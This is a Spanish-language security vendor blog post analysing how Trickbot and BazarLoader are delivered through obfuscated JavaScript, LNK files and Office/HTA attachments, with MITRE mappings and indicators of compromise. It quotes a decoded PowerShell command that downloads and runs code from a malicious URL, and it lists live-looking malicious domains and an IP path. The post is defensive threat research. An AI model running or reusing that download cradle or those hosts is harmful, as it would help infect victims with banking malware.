Blog de Zscaler
Reciba en su bandeja de entrada las últimas actualizaciones del blog de Zscaler
SuscribirseLas nuevas campañas de Trickbot y BazarLoader utilizan múltiples vectores de entrega
El equipo de investigación de Zscaler ThreatLabz supervisa miles de archivos diariamente rastreando amenazas nuevas y generalizadas, incluido uno de los troyanos bancarios más destacados de los últimos cinco años: Trickbot. Trickbot lleva activo desde 2016 y está vinculado a un gran número de campañas maliciosas que involucran la minería de bitcoin y el robo de información bancaria, información de identificación personal (PII) y credenciales. BazarLoader es un producto secundario de este troyano, desarrollado por los mismos autores. Ambos son particularmente peligrosos, ya que son fácilmente modificables y capaces de entregar cargas útiles multietapa, así como de tomar el control de los ordenadores por completo.
ThreatLabz ha descubierto a los operadores de Trickbot utilizando nuevos enfoques para entregar cargas útiles en recientes campañas de ataques. Las muestras de malware que analizamos estaban bien elaboradas y altamente ofuscadas con capacidades de evasión de sandbox. En esta publicación del blog, mostraremos el análisis de los diferentes vectores de entrega utilizados por Trickbot y BazarLoader.
Puntos clave:
1. Los archivos Script y LNK añaden técnicas de evasión para aprovechar las amenazas de malware.
2. La ofuscación multicapa se utiliza para impedir el análisis de archivos JS y LNK.
3. Un adjunto de Office suelta un archivo HTA con fragmentos de funciones HTML y javascript.
4. Se utilizan dominios recientemente registrados para entregar amenazas.
Trickbot está ampliando su gama de tipos de archivos para la entrega de malware
En campañas anteriores, las cargas útiles de Trickbot se soltaban generalmente como archivos adjuntos maliciosos de Microsoft Office. En el último mes, hemos visto que el malware también ha utilizado un gran volumen de archivos javascript, junto con diversos formatos de archivo, como se muestra en los siguientes gráficos:
Fig. 1: Trickbot bloqueado en Zscaler Cloud Sandbox
Fig. 2: BazarLoader bloqueado en Zscaler Cloud Sandbox
En este blog, exploraremos la cadena de ataque para múltiples vectores de entrega, que incluyen:
- Trickbot se propaga a través de archivos de script
- Trickbot se propaga a través de archivos LNK
- BazarLoader se propaga a través de archivos adjuntos de Office
Trickbot se propaga a través de archivos de script
Trickbot logra la intrusión utilizando correos electrónicos de spam agrupados con adjuntos javascript maliciosos, como los siguientes:
Fig. 3: Adjuntos de correo electrónico de spam
En este caso, el archivo javascript [5B606A5495A55F2BD8559778A620F21B] tiene tres capas de ofuscación que se utilizan principalmente para evadir y omitir entornos de sandbox. A continuación se muestra la instantánea de la primera capa ofuscada:
Fig. 4: Primera capa de ofuscación en javascript
Además de hacer un esfuerzo extremo por hacer que los archivos javascript estén muy ofuscados, los autores de malware también han añadido grandes cantidades de código basura al final para que sea más difícil depurar. El código basura consta simplemente de cadenas ofuscadas generadas aleatoriamente que no desempeñan ningún papel en el código malicioso.
Fig. 5: Código de correo basura para dificultar el análisis
Usando la función eval() hemos liberado la segunda capa en la que el código malicioso está integrado con más código de correo no deseado. Después de eliminar esta capa de código basura, la función eval() se utiliza una vez más para recuperar la capa final de código. Podemos ver que los autores de Trickbot utilizaron el método setTimeout(), que evalúa una expresión después de 967 milisegundos para retrasar la ejecución en el sandbox. Esto ayuda al malware a evadir los entornos sandbox.
Fig. 6: Segunda capa de ofuscación en javascript
En la captura anterior podemos ver el método replace implementado en el código donde "hdBDJ" y las cadenas "tSJVh" se eliminan de las variables "YHPhEFtKjqbCmAZ" y "kVYJOrLSqvdAWnaGTX", respectivamente, para obtener la cadena final.
Fig. 7: Capa final
El javascript malicioso ejecuta cmd.exe como proceso hijo, luego cmd.exe ejecuta powershell.exe para descargar Trickbot como carga útil.
Flujo de ejecución:
Wscript.exe ->cmd.exe->powershell.exe
Powershell.exe integrado con el comando codificado base64 y después de decodificar el comando siguiente es:
IEX (New-Object Net.Webclient).downloadstring(https://jolantagraban{.}pl/log/57843441668980/dll/assistant{.}php")
Fig. 8: Detección de Javascript Downloader por Zscaler Cloud Sandbox
Trickbot se propaga a través de archivos LNK
Por lo general, los usuarios ven las extensiones LNK de Windows (LNK) como accesos directos y hemos observado con frecuencia que los ciberdelincuentes utilizan archivos LNK para descargar archivos maliciosos como Trickbot. Trickbot oculta el código en la sección de argumento, en la sección de propiedades del archivo LNK. El autor del malware añadió espacios adicionales entre el código malicioso para intentar dificultar la depuración del código por parte de los investigadores. Hemos visto esta técnica utilizada anteriormente en la campaña de Emotet, que utilizaba archivos adjuntos maliciosos de Office en 2018.
Fig. 9: Código integrado en la sección de propiedades de LNK
Descargando Trickbot:
- LNK descarga el archivo de 45.148.121.227/images/readytunes.png utilizando un argumento silencioso para que el usuario no pueda ver ningún mensaje de error o acción de progreso.
- Después de la descarga, el malware guarda el archivo en la carpeta Temp con el nombre application1_form.pdf.
- Por último, se cambia el nombre del archivo de application1_form.pdf a support.exe y se ejecuta. Aquí, support.exe es Trickbot.
Fig. 10: Detección de LNK Downloader por Zscaler Cloud Sandbox
BazarLoader se propaga a través de archivos adjuntos de Office
Esta es una de las otras técnicas utilizadas en TA551 APT también conocida como Shathak. Los documentos de Office maliciosos sueltan el archivo HTA en "C\ProgramData\sda.HTA". Este archivo HTA contiene HTML y vbscript diseñados para recuperar un DLL malicioso con el fin de infectar un host vulnerable de Windows con BazarLoader.
Una vez habilitado para macros, el proceso mshta.exe se ejecuta para descargar una carga útil. En el pasado, se ha observado que esta campaña entrega BazarLoader y Trickbot.
Fig. 11: Cadena de ataque del archivo DOC para descargar BazarLoader
Los datos codificados en base64 se implementan en la etiqueta HTML <div>, que se utiliza posteriormente con javascript.
Fig. 12: Archivo HTA abandonado, codificación maliciosa en base64 bajo la sección HTML <div>
A continuación se muestra la instantánea de los datos base64 de decodificación en la que podemos ver cómo se descarga la carga útil y se guarda como FriIFriend.jpg en la máquina víctima:
Fig. 13: Archivo HTA abandonado, datos base64 de decodificación
Redes: C&C para descargar BazarLoader
Fig. 14: Enviar solicitud para descargar BazarLoader
También hemos observado dominios recién registrados (NRD) creados específicamente para distribuir estas cargas útiles, utilizando un stealer entregado a través de correo electrónico de spam y agrupado con un archivo adjunto malicioso de Microsoft Office.
Fig. 15: Dominio recién registrado
Fig. 16: Detección de Zscaler Cloud Sandbox del descargador de archivos de Office maliciosos
MITRE ATT&CK
T5190 |
Recopile información de la red de víctimas |
T1189 |
Compromiso de acompañamiento |
T1082 |
Detección de información del sistema |
T1140 |
Desofuscar / descodificar archivos o información |
T1564 |
Ocultar artefactos |
T1027 |
Archivos o información ofuscados |
Indicadores de compromiso
MD5 |
Nombre de archivo |
Tipo de archivo |
B79AA1E30CD460B573114793CABDAFEB |
100.js |
JS |
AB0BC0DDAB99FD245C8808D2984541FB |
4821.js |
JS |
192D054C18EB592E85EBF6DE4334FA4D |
4014.js |
JS |
21064644ED167754CF3B0C853C056F54 |
7776.js |
JS |
3B71E166590CD12D6254F7F8BB497F5A |
7770.js |
JS |
5B606A5495A55F2BD8559778A620F21B |
68.js |
JS |
BA89D7FC5C4A30868EA060D526DBCF56 |
Subcontractor Reviews (Sep 2021).lnk |
LNK |
MD5 |
Nombre de archivo |
Tipo de archivo |
C7298C4B0AF3279942B2FF630999E746 |
a087650f65f087341d07ea07aa89531624ad8c1671bc17751d3986e503bfb76.bin.sample.gz |
DOC |
3F06A786F1D4EA3402A3A23E61279931 |
- |
DOC |
URL asociadas:
jolantagraban.pl/log/57843441668980/dll/assistant.php
blomsterhuset-villaflora.dk/assistant.php
d15k2d11r6t6rl.cloudfront.net/public/users/beefree
C&C:
Dominio |
Carga útil |
jolantagraban.pl |
Trickbot |
glareestradad.com |
BazarLoader |
francopublicg.com |
BazarLoader |
¿Este post ha sido útil?
Reciba las últimas actualizaciones del blog de Zscaler en su bandeja de entrada
Al enviar el formulario, acepta nuestra política de privacidad.